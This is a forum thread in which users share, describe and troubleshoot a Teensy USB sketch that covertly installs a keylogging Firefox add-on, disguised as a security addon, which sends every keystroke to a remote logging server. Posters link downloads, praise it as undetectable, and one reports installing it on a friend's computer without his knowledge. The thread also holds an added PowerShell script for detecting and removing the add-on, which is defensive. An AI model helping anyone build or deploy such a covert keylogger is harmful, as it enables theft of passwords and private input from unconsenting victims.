
[Version 1] Firefox Keylogger With Ducky


sandred

By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof-of-concept keylogger plugin installation for Firefox. When the Teensy is inserted into USB, it uploads the plugin files into the C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into Firefox by adding a registry key under HKCU\Software\Mozilla\Firefox\Extensions. If Firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin (displayed as "Firefox Security Addon") loads when Firefox starts the next time. If everything goes fine, it will be done in 10 seconds.

The keystrokes are then sent to the remote server (specified in the code). The remote server then captures the keystrokes, timestamps and IP-stamps the data (bonus! we get the IP too) and logs it.

Please keep in mind that this is by no means polished or optimized code; bugs will exist. So watch out. I quickly copy-pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this cannot be implemented in a more sophisticated way for other plugin-supported browsers and for all OSes. I would love to see somebody optimize it.

Download the code from here

http://karmetasploit.com/KL/AllFiles.zip

If you do not bother to change the server or just want to test it, then the logs are currently stored in this location:

http://karmetasploit.com/KL/logger.txt

Some plus points with these kind of keyloggers:

  • It works behind whatever firewalls as long as Firefox gets the internet.
  • 100% AV undetectable
  • You can decide to log or not to log based on ip.

Why bother stealing cookies when you can get all the key strokes. :)


Can you go into a little more detail on how exactly this works?

Does the FF plugin go onto a separate thumbdrive or does it download the plugin then install it? The rest of it seems pretty straightforward..

Edited by Elementix

You could try looking at the code!

It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.

If you'd read the code, it's pretty easy to see those 11 JavaScript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string of an HTTP GET request to a particular URL. The 7 lines of PHP receive it and put it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the gist of it.

If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kind of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!

To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple.

I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

Edited by Paul Stoffregen

Well, thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the ins and outs of how everything works, so chill out with that crap.

With that being said, are all these files just flashed onto the teensy (besides the php script)? I'm just a bit confused...


All the code does is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry under HKCU (which does not need admin rights) to tell Firefox "Hey, there is a plugin that you need to load at C:\kl", and when Firefox starts it loads the code. Once loaded, the plugin watches all the keystrokes made into the browser and quietly posts them to the remote server. The PHP script is placed on the server, which then takes these keys sent and stores them to a file.

You do not need to load these files into the Teensy. All you need to do is compile the code in Arduino and flash the Teensy with it. When you plug in the Teensy, it just echoes the code to the files and does the rest of that stuff. You can just try it as it is without changing anything. You can always uninstall it after testing.

Yes, the keylogger is very simple and very effective and completely undetectable, as it is effectively just 2 lines of JavaScript running inside a browser. I already field-tested it on one of my friends' computers and he does not think anything ever happened at all when the Teensy installed it. I had to explain the details to him, and even after that he does not really believe that's possible. Well, educate the masses, I guess.
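A check to run on a machine you think was hit by this (an added example, not code from the thread or from its download): it lists every add-on registered through the registry, both in the HKCU\Software\Mozilla\Firefox\Extensions key the sketch writes and in the HKLM equivalent that legacy Firefox also honoured, flags any entry whose folder sits outside the Firefox install directory or the user's profile, and can remove the registry value together with the C:\kl drop folder. It assumes the legacy add-on manifest is named install.rdf, the usual Firefox install locations, and that the drop folder name from the thread was not changed.

```powershell
# Added example, not code from the thread. Audits the registry-based add-on
# registration described above and optionally removes it. Assumptions are
# marked in comments.

# Legacy (pre-WebExtension) Firefox read both hives; the sketch only writes
# HKCU, which needs no admin rights.
$extKeys = @(
    'HKCU:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\Mozilla\Firefox\Extensions'
)

# Drop folder name as posted in the thread (assumption: unchanged).
$dropFolder = 'C:\kl'

function Get-RegisteredFirefoxExtensions {
    foreach ($key in $extKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item $key
        # Each value is <extension id> = <folder the add-on is loaded from>
        foreach ($id in $item.GetValueNames()) {
            $path = [string]$item.GetValue($id)
            if ([string]::IsNullOrWhiteSpace($path)) { continue }

            # install.rdf is the legacy manifest name (assumption); pull the
            # display name out of it so the finding matches the Add-ons list.
            $name = $null
            $manifest = Join-Path $path 'install.rdf'
            if (Test-Path $manifest) {
                try {
                    [xml]$rdf = Get-Content -Raw $manifest
                    $node = $rdf.GetElementsByTagName('em:name') | Select-Object -First 1
                    if ($node) { $name = $node.InnerText }
                } catch { $name = '<unparseable install.rdf>' }
            }

            # Add-ons Firefox installs itself live under its install directory or
            # the profile; anything else (such as C:\kl) deserves a look.
            $expected = -not (
                $path -like "$env:ProgramFiles\Mozilla Firefox\*" -or
                $path -like "${env:ProgramFiles(x86)}\Mozilla Firefox\*" -or
                $path -like "$env:APPDATA\Mozilla\*"
            )

            [pscustomobject]@{
                Hive       = $key
                Id         = $id
                Path       = $path
                Exists     = (Test-Path $path)
                Name       = $name
                Suspicious = $expected
            }
        }
    }
}

function Remove-RegisteredFirefoxExtension {
    # Deletes the registry value for one finding; the drop folder is removed
    # only when it is the one named in the thread, so nothing else is touched.
    param([Parameter(Mandatory)] $Finding)
    Remove-ItemProperty -Path $Finding.Hive -Name $Finding.Id
    if ($Finding.Path -eq $dropFolder -and (Test-Path $dropFolder)) {
        Remove-Item -Recurse -Force $dropFolder
    }
}

$findings = Get-RegisteredFirefoxExtensions
$findings | Format-Table -AutoSize

foreach ($f in ($findings | Where-Object Suspicious)) {
    Write-Warning "Externally registered add-on '$($f.Name)' ($($f.Id)) loads from $($f.Path)"
}
if (Test-Path $dropFolder) {
    Write-Warning "Drop folder $dropFolder is present"
}

# Uncomment to clean up every flagged entry:
# $findings | Where-Object Suspicious | ForEach-Object { Remove-RegisteredFirefoxExtension $_ }
```

Run it in the same user context as the victim, since the sketch writes HKCU; removing an HKLM value needs an elevated shell. Firefox reads the key at startup, so restart it after cleanup and confirm the add-on has disappeared from the Add-ons list. The technique as posted relies on Firefox of the 3.5/3.6 era: from Firefox 8 onward, add-ons registered by a third party are disabled until the user approves them, and Firefox 57 dropped legacy add-ons altogether, so the silent install will not work as described against a current browser.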


Ok, so I understand how things work now and I got things running for the most part... but for some reason it isn't working. It doesn't look like it adds anything new into the Mozilla portion of the registry and I don't see any new plugins/addons in Firefox. I've tried on 3 different PCs and I'm kinda stuck right now... any thoughts?


Have a look in the registry to see if it adds the entry. I know Defense+ (Comodo) blocks unauthorized access to the registry; try disabling all your antivirus/firewall solutions and try it.


If you have a folder C:\kl (maybe from previous runs), then you have to delete it before running it again. Try that, and try to plug it in with nothing else running on your computer; maybe your computer is slow at multitasking and missing some keystrokes.


Well, that's not the problem... I'm on a quad-core machine with 3 gigs of RAM. I've tried it on my PC, which is running a 32-bit copy of Windows 7, and I also tried it in 2 separate virtual machines running a fresh install of XP with Firefox installed. It does seem like it's working, but everything is going so fast I can't even see if there are any errors being displayed...

All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with right?


Well, apparently it just decided that it wanted to start working....Thanks anyway guys. :)

Edit: Ok, so it worked on a new virtual machine with XP but it doesn't seem to want to work with my clean install of Windows 7 on my actual machine.. *sigh*...guess I'll keep playing with it...

Edited by Elementix

It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different..


4 weeks later...

I have put them back. Let me know if you have a problem.

Sandyreddy,

Thanks for putting this back up. I had a little trouble compiling it in Arduino due to it not finding the header file. After renaming the header file the whole thing worked like a charm.

Specs:

- 32 bit XP as a VM

- Firefox version 3.5.7.

Fitzdaddy


Fellow Teensy Fans,

Here is my whack at the keylogger for Firefox. I have done a little housecleaning on the source code (neat freak) and added support for Linux. Currently I use the command "gnome-terminal" to get a shell, so it will only work on GNOME Linux distributions. For some reason the Arduino IDE did not like the name keylogger anymore, so I had to rename it.

Future improvements could be to suppress notification of additional extensions and cleaning up the presentation of the windows command prompt.

I hope it is clear from the source code that much credit goes to Sandyreddy and those that he got inspiration from.

http://dl.dropbox.com/u/1588928/fflogger.tar.gz

Fitzdaddy


1 year later...

So smart to have a deep study on keylogger things, Sandred. I think it is very difficult and complicated... so even when I needed one to use on my laptop, I just bought one online knowing nothing about it. But luckily it works not badly.
